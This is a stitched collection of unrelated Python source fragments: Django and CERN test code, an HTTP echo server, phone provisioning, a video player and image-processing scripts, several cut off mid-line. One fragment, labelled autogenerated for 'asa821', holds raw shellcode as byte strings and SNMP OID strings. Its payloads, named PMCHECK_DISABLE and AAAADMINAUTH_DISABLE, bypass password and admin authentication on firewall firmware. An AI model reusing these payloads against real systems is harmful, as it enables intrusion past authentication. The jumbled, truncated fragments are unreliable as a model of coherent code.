secret = self.prep_secret(files)
if secret['returncode'] != 0:
return secret
sfile_path = '/tmp/%s' % self.name
with open(sfile_path, 'w') as sfd:
sfd.write(json.dumps(secret['results']))
atexit.register(Utils.cleanup, [sfile_path])
return self._replace(sfile_path, force=force)
def prep_secret(self, files=None, contents=None):
''' return what the secret would look like if |
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
# or submit itself to any jurisdiction.
"""Integration tests for deleting deposits."""
import json
# #######################################
# # api/deposits/{pid} [DELETE]
# #######################################
def test_delete_deposit_with_non_existing_pid_returns_404(app,
auth_headers_for_superuser):
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format('non-existing-pid'),
headers=auth_headers_for_superuser)
assert resp.status_code == 404
def test_delete_deposit_when_user_has_no_permission_returns_403(app,
users,
create_deposit,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
other_user_headers = auth_headers_for_user(users['lhcb_user2'])
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=other_user_headers)
assert resp.status_code == 403
def test_delete_deposit_when_user_is_owner_can_delete_his_deposit(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
owner = users['lhcb_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
headers = auth_headers_for_user(owner) + json_headers
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 204
# deposit not existing anymore
resp = client.get('/deposits/{}'.format(deposit['_deposit']['id']),
headers=headers)
assert resp.status_code == 410
def test_delete_deposit_when_deposit_published_already_cant_be_deleted(app,
users,
create_deposit,
json_headers,
auth_headers_for_user):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
headers = auth_headers_for_user(users['lhcb_user']) + json_headers
pid = deposit['_deposit']['id']
with app.test_client() as client:
resp = client.post('/deposits/{}/ | actions/publish'.format(pid),
headers=headers)
resp = client.delete('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 403
# deposit not removed
resp = client.get('/deposits/{}'.format(pid),
headers=headers)
assert resp.status_code == 200
def test_delete_deposit_whe | n_superuser_can_delete_others_deposit(app,
users,
create_deposit,
auth_headers_for_superuser):
deposit = create_deposit(users['lhcb_user'], 'lhcb-v0.0.1')
with app.test_client() as client:
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_superuser)
assert resp.status_code == 204
def test_delete_deposit_when_user_with_admin_access_can_delete(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-admin'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 204
def test_delete_deposit_when_user_only_with_read_write_access_returns_403(app,
users,
create_deposit,
auth_headers_for_user,
json_headers):
owner, other_user = users['lhcb_user'], users['cms_user']
deposit = create_deposit(owner, 'lhcb-v0.0.1')
permissions = [{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-read'
},{
'email': other_user.email,
'type': 'user',
'op': 'add',
'action': 'deposit-update'
}]
with app.test_client() as client:
# give other user read/write access
resp = client.post('/deposits/{}/actions/permissions'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(owner) + json_headers,
data=json.dumps(permissions))
resp = client.delete('/deposits/{}'.format(deposit['_deposit']['id']),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 403
|
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
success = 0
total =0
def do_GET(self):
request_path = self.path
print("\n----- Request Start ----->\n")
print(request_path)
print(self.headers)
print("<----- Request End -----\n")
self.send_response(200)
self.send_header("Set-Cookie", "foo=bar")
def do_POST(self):
request_path = self.path
print("\n----- Request Start ----->\n")
# print(request_path)
#
request_headers = self.headers
content_length = request_headers.getheaders('content-length')
length = int(content_length[0]) if content_length else 0
# print(request_h#eaders)
print(self.rfile.read(length))
"""
r = self.rfile.read(length).split('=')[-1]
print r
if r == 'true':
success += 1
total +=1
else:
total +=1
print success
print total
print''
"""
print("<----- Request End -----\n")
self.send_response(200)
do_PUT = do_POST
do_DELETE = do_GET
def main():
port = 8080
print('Listening on localhost:%s' % port)
server = HTTPServer(('', port), | RequestHandler)
server.serve_forever()
if __name__ == "__main__":
parser = OptionParser()
parser.usage = ("Creates an http-server that will echo out any GE | T or POST parameters\n"
"Run:\n\n"
" reflect")
(options, args) = parser.parse_args()
main()
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existant file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.datasource import DataSource
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, gdal_release_date, GEOJSON, GDAL_VERSION
from d | jango.contrib.gis.gdal.srs import SpatialReference, CoordTransform
from django.contrib.gis.gdal.geometries import OGRGeometry
HAS_GDAL = True
except:
HAS_GDAL, GEOJSON = False, False
try:
from django.contrib.gis.gdal.envelope import Envelope
except Im | portError:
# No ctypes, but don't raise an exception.
pass
from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
|
from pycp2k.inputsection import InputSection
from ._each406 import _eac | h406
class _restart14(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Section_parameters = None
self.Add_last = None
self.Common_iteration_levels = None
self.Filename = None
self.Log_print_key = None
self.EACH = _each406()
self._name = "RESTART"
| self._keywords = {'Log_print_key': 'LOG_PRINT_KEY', 'Filename': 'FILENAME', 'Add_last': 'ADD_LAST', 'Common_iteration_levels': 'COMMON_ITERATION_LEVELS'}
self._subsections = {'EACH': 'EACH'}
self._attributes = ['Section_parameters']
|
def resizeApp(app, dx, dy):
switchApp(app)
corner = find(Pattern("1273159241516.png").targetOffset(3,14))
dragDrop(corner, corner.getCenter().offset(dx, dy))
resizeApp("Safari", 50, 50)
# exists("1273159241516.png")
# click(Pattern("1273159241516.png").targetOffset(3,14).similar(0.7).firstN(2))
# with Region(10,100,300,300):
# pass
# click("__SIKULI-CAPTURE-BUTTON__" | )
| |
"""
WSGI config for geology project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``ru | nfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` | setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geology.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
#
# this file autogenerated, do not touch
#
vers = "asa821"
my_ret_addr_len = 4
my_ret_addr_byte = "\x93\xf2\x2b\x09"
my_ret_addr_snmp = "147.242.43.9"
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
preamble_len = 41
preamble_byte = "\xb8\xc9\x3f\x10\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60"
preamble_snmp = "184.201.63.16.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96"
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
successmsg_len = 19
successmsg_byte = "\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58"
successmsg_snmp = "184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88"
launcher_len = 11
launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0"
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208"
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\xd4\x7c\x09\x50\xb8\xc5\xed\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.212.124.9.80.184.197.237.163.173.53.165.165.165.165.255.208.88.195"
payload_PMCHECK_DISABLE_len = 66
payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_PMCHECK_ENABLE_len = 66
payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x0e\x24\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xa5\x81\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_PMCHECK_ENABLE_snmp = "235.20.191.240.14.36.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.165.129.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_AAAADMINAUTH_ENABLE_len = 66
payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x | 00\x | 00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80"
payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128"
|
self.http_service = HTTPNoListingFileService(self._tftpboot_dir)
http_dev_info_extractor = BaseSnomHTTPDeviceInfoExtractor()
def _common_templates(self):
yield ('common/gui_lang.xml.tpl', 'gui_lang.xml')
yield ('common/web_lang.xml.tpl', 'web_lang.xml')
for tpl_format, file_format in [('common/snom%s.htm.tpl', 'snom%s.htm'),
('common/snom%s.xml.tpl', 'snom%s.xml'),
('common/snom%s-firmware.xml.tpl', 'snom%s-firmware.xml')]:
for model in self._MODELS:
yield tpl_format % model, file_format % model
def configure_common(self, raw_config):
for tpl_filename, filename in self._common_templates():
tpl = self._tpl_helper.get_template(tpl_filename)
dst = os.path.join(self._tftpboot_dir, filename)
self._tpl_helper.dump(tpl, raw_config, dst, self._ENCODING)
def _update_sip_lines(self, raw_config):
proxy_ip = raw_config.get(u'sip_proxy_ip')
backup_proxy_ip = raw_config.get(u'sip_backup_proxy_ip')
voicemail = raw_config.get(u'exten_voicemail')
for line in raw_config[u'sip_lines'].itervalues():
if proxy_ip:
line.setdefault(u'proxy_ip', proxy_ip)
if backup_proxy_ip:
line.setdefault(u'backup_proxy_ip', backup_proxy_ip)
if voicemail:
line.setdefault(u'voicemail', voicemail)
def _get_fkey_domain(self, raw_config):
# Return None if there's no usable domain
if u'sip_proxy_ip' in raw_config:
return raw_config[u'sip_proxy_ip']
else:
lines = raw_config[u'sip_lines']
if lines:
return lines[min(lines.iterkeys())][u'proxy_ip']
return None
def _add_fkeys(self, raw_config, model):
domain = self._get_fkey_domain(raw_config)
if domain is None:
if raw_config[u'funckeys']:
logger.warning('Could not set funckeys: no domain part')
else:
lines = []
for funckey_no, funckey_dict in sorted(raw_config[u'funckeys'].iteritems(),
key=itemgetter(0)):
funckey_type = funckey_dict[u'type']
if funckey_type == u'speeddial':
type_ = u'speed'
suffix = ''
elif funckey_type == u'park':
if model in ['710', '720', '715', '760']:
type_ = u'orbit'
suffix = ''
else:
type_ = u'speed'
suffix = ''
elif funckey_type == u'blf':
if u'exten_pickup_call' in raw_config:
type_ = u'blf'
suffix = '|%s' % raw_config[u'exten_pickup_call']
else:
logger.warning('Could not set funckey %s: no exten_pickup_call',
funckey_no)
continue
else:
logger.info('Unsupported funckey type: %s', funckey_type)
continue
value = funckey_dict[u'value']
label = escape(funckey_dict.get(u'label', value))
fkey_value = self._format_fkey_value(type_, value, domain, suffix)
lines.append(u'<fkey idx="%d" label="%s" context="active" perm="R">%s</fkey>' %
(int(funckey_no) - 1, label, fkey_value))
raw_config[u'XX_fkeys'] = u'\n'.join(lines)
def _format_fkey_value(self, fkey_type, value, domain, suffix):
return '%s <sip:%s@%s>%s' % (fkey_type, value, domain, suffix)
def _add_lang(self, raw_config):
if u'locale' in raw_config:
locale = raw_config[u'locale']
if locale in self._LOCALE:
raw_config[u'XX_lang'] = self._LOCALE[locale]
def _format_dst_change(self, dst_change):
fmted_time = u'%02d:%02d:%02d' % tuple(dst_change['time'].as_hms)
day = dst_change['day']
if day.startswith('D'):
return u'%02d.%02d %s' % (int(day[1:]), dst_change['month'], fmted_time)
else:
week, weekday = map(int, day[1:].split('.'))
weekday = tzinform.week_start_on_monday(weekday)
return u'%02d.%02d.%02d %s' % (dst_change['month'], week, weekday, fmted_time)
def _format_tzinfo(self, tzinfo):
lines = []
lines.append(u'<timezone perm="R"></timezone>')
lines.append(u'<utc_offset perm="R">%+d</utc_offset>' % tzinfo['utcoffset'].as_seconds)
if tzinfo['dst'] is None:
lines.append(u'<dst perm="R"></dst>')
else:
lines.append(u'<dst perm="R">%d %s %s</dst>' %
(tzinfo['dst']['save'].as_seconds,
self._format_dst_change(tzinfo['dst']['start']),
self._format_dst_change(tzinfo['dst']['end'])))
return u'\n'.join(lines)
def _add_timezone(self, raw_config):
if u'timezone' in raw_config:
try:
tzinfo = tzinform.get_timezone_info(raw_config[u'timezone'])
except tzinform.TimezoneNotFoundError, e:
logger.warning('Unknown timezone %s: %s', raw_config[u'timezone'], e)
else:
raw_config[u'XX_timezone'] = self._format_tzinfo(tzinfo)
def _add_user_dtmf_info(self, raw_config):
dtmf_mode = raw_config.get(u'sip_dtmf_mode')
for line in raw_config[u'sip_lines'].itervalues():
cur_dtmf_mode = line.get(u'dtmf_mode', dtmf_mode)
line[u'XX_user_dtmf_info'] = self._SIP_DTMF_MODE.get(cur_dtmf_mode, u'off')
def _add_msgs_blocked(self, raw_config):
msgs_blocked = ''
for line_no, line in raw_config[u'sip_lines'].iteritems():
if line.get('backup_proxy_ip'):
backup_line_no = int(line_no) + 1
msgs_blocked += ' Identity%02dIsNotRegistered' % backup_line_no
raw_config['XX_msgs_blocked'] = msgs_blocked
def _gen_xx_dict(self, raw_config):
xx_dict = self._XX_DICT[self._XX_DICT_DEF]
if u'locale' in raw_config:
locale = raw_config[u'locale']
lang = locale.split('_', 1)[0]
if lang in self._XX_DICT:
xx_dict = self._XX_DICT[lang]
return xx_dict
def _dev_specific_filenames(self, device):
# Return a tuple (htm filename, xml filename)
fmted_mac = format_mac(device[u'mac'], separator='', uppercase=True)
return 'snom%s-%s.htm' % (devic | e[u'model'], fmted_mac), fmted_mac + '.xml'
def _check_config(self, raw_config):
if u'http_port' not in raw_config:
raise RawConfigError('only support configuration via HTTP')
def _check_device(self, device):
if u'mac' not in device:
raise Exception('MAC address needed for device configuration')
# model | is needed since filename has model name in it.
if u'model' not in device:
raise Exception('model needed for device configuration')
def configure(self, device, raw_config):
self._check_config(raw_config)
self._check_device(device)
htm_filename, xml_filename = self._dev_specific_filenames(device)
# generate xml file
tpl = self._tpl_helper.get_dev_template(xml_filename, device)
model = device.get(u'model')
self._update_sip_lines(raw_config)
self._add_fkeys(raw_config, model)
self._add_lang(raw_config)
self._add_timezone(raw_config)
self._add_user_dtmf_info(raw_config)
self._add_msgs_blocked(raw_config)
raw_config[u'XX_dict'] = self._gen_xx_dict(raw_config)
raw_config[u'XX_options'] = device.get(u'options', {})
path = os.path.join(self._tftpboot_dir, xml_filename)
self._tpl_helper.dump(tpl, raw_config, path, self._ENCODING)
# generate htm file
tpl = s |
lambda x: x
def __setitem__(self, key, value):
return
def __getitem__(self, key):
return
def play(self, *args, **kwargs):
pass
def seek(self, *args, **kwargs):
pass
def frame_step(self, *args, **kwargs):
pass
def frame_back_step(self, *args, **kwargs):
pass
class VideoPlayer(QWidget):
def __init__(self, parent=None, pixlib=None):
super(VideoPlayer, self).__init__(parent)
self.pixlib = pixlib
self.markers = {}
self.video_window = QWidget(self)
self.video_window.setStyleSheet("background-color: #161616;")
if not has_mpv:
self.player = DummyPlayer()
else:
try:
self.player = MPV(
keep_open=True, wid=str(int(self.video_window.winId()))
)
except Exception:
log_traceback(handlers=False)
self.player = DummyPlayer()
self.position = 0
self.duration = 0
self.mark_in = 0
self.mark_out = 0
self.fps = 25.0
self.loaded = False
self.duration_changed = False
self.prev_position = 0
self.prev_duration = 0
self.prev_mark_in = 0
self.prev_mark_out = 0
#
# Displays
#
self.mark_in_display = TimecodeWindow(self)
self.mark_in_display.setToolTip("Selection start")
self.mark_in_display.returnPressed.connect(
functools.partial(self.on_mark_in, self.mark_in_display)
)
self.mark_out_display = TimecodeWindow(self)
self.mark_out_display.setToolTip("Selection end")
self.mark_out_display.returnPressed.connect(
functools.partial(self.on_mark_out, self.mark_out_display)
)
self.io_display = TimecodeWindow(self)
self.io_display.setToolTip("Selection duration")
self.io_display.setReadOnly(True)
self.position_display = TimecodeWindow(self)
self.position_display.setToolTip("Clip position")
self.position_display.returnPressed.connect(
functools.partial(self.seek, self.position_display)
)
self.duration_display = TimecodeWindow(self)
self.duration_display.setToolTip("Clip duration")
self.duration_display.setReadOnly(True)
#
# Controls
#
self.timeline = QSlider(Qt.Horizontal)
self.timeline.setRange(0, 0)
self.timeline.sliderMoved.connect(self.on_timeline_seek)
self.region_bar = RegionBar(self)
self.navbar = get_navbar(self)
#
# Layout
#
bottom_bar = QHBoxLayout()
top_bar = QHBoxLayout()
top_bar.addWidget(self.mark_in_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.io_display, 0)
top_bar.addStretch(1)
top_bar.addWidget(self.mark_out_display, 0)
bottom_bar.addWidget(self.position_display, 0)
bottom_bar.addWidget(self.navbar, 1)
bottom_bar.addWidget(self.duration_display, 0)
layout = QVBoxLayout()
layout.addLayout(top_bar)
layout.addWidget(self.video_window)
layout.addWidget(self.region_bar)
layout.addWidget(self.timeline)
layout.addLayout(bottom_bar)
self.setLayout(layout)
self.navbar.setFocus(True)
@self.player.property_observer("time-pos")
def time_observer(_name, value):
self.on_time_change(value)
@self.player.property_observer("duration")
def duration_observer(_name, value):
self.on_duration_change(value)
@self.player.property_observer("pause")
def pause_observer(_name, value):
self.on_pause_change(value)
# Displays updater
self.display_timer = QTimer()
self.display_timer.timeout.connect(self.on_display_timer)
self.display_timer.start(40)
@property
def frame_dur(self):
return 1 / self.fps
def load(self, path, mark_in=0, mark_out=0, markers={}):
self.loaded = False
self.markers = markers
self.player["pause"] = True
self.player.play(path)
self.prev_mark_in = -1
self.prev_mark_out = -1
self.mark_in = mark_in
self.mark_out = mark_out
self.mark_in_display.set_value(0)
self.mark_out_display.set_value(0)
self.duration_display.set_value(0)
self.position_display.set_value(0)
def on_time_change(self, value):
self.position = value
def on_duration_change(self, value):
if value:
self.duration = value
self.loaded = True
else:
self.duration = 0
self.loaded = False
self.duration_changed = True
self.region_bar.update()
def on_pause_change(self, value):
if hasattr(self, "action_play"):
self.action_play.setIcon(QIcon(self.pixlib[["pause", "play"][int(value)]]))
def on_timeline_seek(self):
if not self.loaded:
return
try:
self.player["pause"] = True
self.player.seek(self.timeline.value() / 100.0, "absolute", "exact")
except Exception:
pass
def on_frame_next(self):
if not self.loaded:
return
self.player.frame_step()
def on_frame_prev(self):
if not self.loaded:
return
self.player.frame_back_step()
def on_5_next(self):
if not self.loaded:
return
self.player.seek(5 * self.frame_dur, "relative", "exact")
def on_5_prev(self):
if not self.loaded:
return
self.player.seek(-5 * self.frame_dur, "relative", "exact")
def on_go_start(self):
if not self.loaded:
return
self.player.seek(0, "absolute", "exact")
def on_go_end(self):
if not self.loaded:
return
self.player.seek(self.duration, "absolute", "exact")
def on_go_in(self):
if not self.loaded:
return
self.seek(self.mark_in)
def on_go_out(self):
if not self.loaded:
return
self.seek(self.mark_out or self.duration)
def on_mark_in(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_in = value
self.setFocus()
else:
self.mark_in = self.position
self.region_bar.update()
def on_mark_out(self, value=False):
if not self.loaded:
return
if value:
if isinstance(value, TimecodeWindow):
value = value.get_value()
self.seek(min(max(value, 0), self.duration))
self.mark_out = value
self.setFocus()
else:
self.mark_out = self.position
self.region_bar.update()
def on_clear_in(self):
if not self.loaded:
return
self.mark_in = 0
self.region_bar.update()
def on_clear_out(self):
if not self.loaded:
return
self.mark_out = 0
self.region_bar.update()
def on_clear_marks(self):
if not self.loaded:
return
self.mark_out = self.mark_in = 0
self.region_bar.update()
def seek(self, position):
if not self.loaded:
return
if isinstanc | e(position, TimecodeWindow):
position = position.get_value()
self.setFocus()
self.player.seek(position, "absolute", "exact")
def on_pause(self):
if not self.loaded:
return
self.player["pause"] = not self.player["pause"]
def force_pause(self):
| if not self.loaded:
return
if not self.player["pause"]:
self.player["pause"] = True
def update_marks(self):
i = self.mark_in
o = self.mark_out or self.duration
self.mark_in_displ |
## image quickie!
## install PIL (Python Imaging Library) first. Supercool lib
import Image ## from Pil !
fImageOrig = "C:\\evil1.jpg"
im = Image.open(fImageOrig)
print im.size, im.mode
width, height = im.size
## get pixel list
lpix = list(im.getdata())
def getEvenOdd(lpix, width, height):
return getPixels(lpix, width, height, 0)
def getOddEven(lpix, width, height):
return getPixels(lpix, width, height, 1)
def getPixels(lpix, width, height, baseoffset):
thelist = []
for i in range(height):
offset = baseoffset
if (i % 6 in [3,4,5]):
offset = 1 - baseoffset
## get all "even" pixels on rows like 0,1,2, and all
## "odd" pixels on rows like 3,4,5
thelist.extend(lpix[offset + width*i : offset + width*i + width : 2])
return thelist
|
##l0 = getEvenOdd(lpix, width, height)
##l1 = getOddEven(lpix, width, height)
l0 = lpix[::2]
l1 = lpix[1::2]
im0 = Image.new(im.mode, (width/2, height))
im0.putdata(l0)
im0.save("c:\\ev0.jpg")
im1 = Image.new(im.mode, (width/2, height))
im1.putdata(l1)
im1.save("c:\\ev1.jpg")
def getAnXthPartHeight(lpix, width, height, startline, x=6):
l = [] |
print width, height, startline
for i in range(startline, height, x):
l.extend(lpix[i*width : (i+1)*width])
return l
def getAnXthPartWidth(lpix, width, height, startcol, x=8):
print width, height, startcol
return lpix[startcol::x]
magicheight = 5
listsEven = range(magicheight)
imagesEven = range(magicheight)
for i in range(magicheight):
listsEven[i] = getAnXthPartHeight(l0, width/2, height, i, magicheight)
imagesEven[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesEven[i].putdata(listsEven[i])
imagesEven[i].save("c:\\evil_even_" + str(magicheight) + "_" + str(i) + ".jpg")
listsOdd = range(magicheight)
imagesOdd = range(magicheight)
for i in range(magicheight):
listsOdd[i] = getAnXthPartHeight(l1, width/2, height, i, magicheight)
imagesOdd[i] = Image.new(im.mode, (width/2, height/magicheight))
imagesOdd[i].putdata(listsOdd[i])
imagesOdd[i].save("c:\\evil_odd_" + str(magicheight) + "_" + str(i) + ".jpg")
magicwidth = 4
for j in range(magicheight):
listsEvenJ = range(magicwidth)
imagesEvenJ = range(magicwidth)
for i in range(magicwidth):
listsEvenJ[i] = getAnXthPartWidth(listsEven[j], width/2, height, i, magicwidth)
imagesEvenJ[i] = Image.new(im.mode, ((width/2)/magicwidth, height/magicheight))
imagesEvenJ[i].putdata(listsEvenJ[i])
imagesEvenJ[i].save("c:\\evil_even_" + str(magicheight) + "_" + \
str(magicwidth) + "_" + str(i) + "_" + str(j) + ".jpg")
for j in range(magicheight):
listsOddJ = range(magicwidth)
imagesOddJ = range(magicwidth)
for i in range(magicwidth):
listsOddJ[i] = getAnXthPartWidth(listsOdd[j], width/2, height, i, magicwidth)
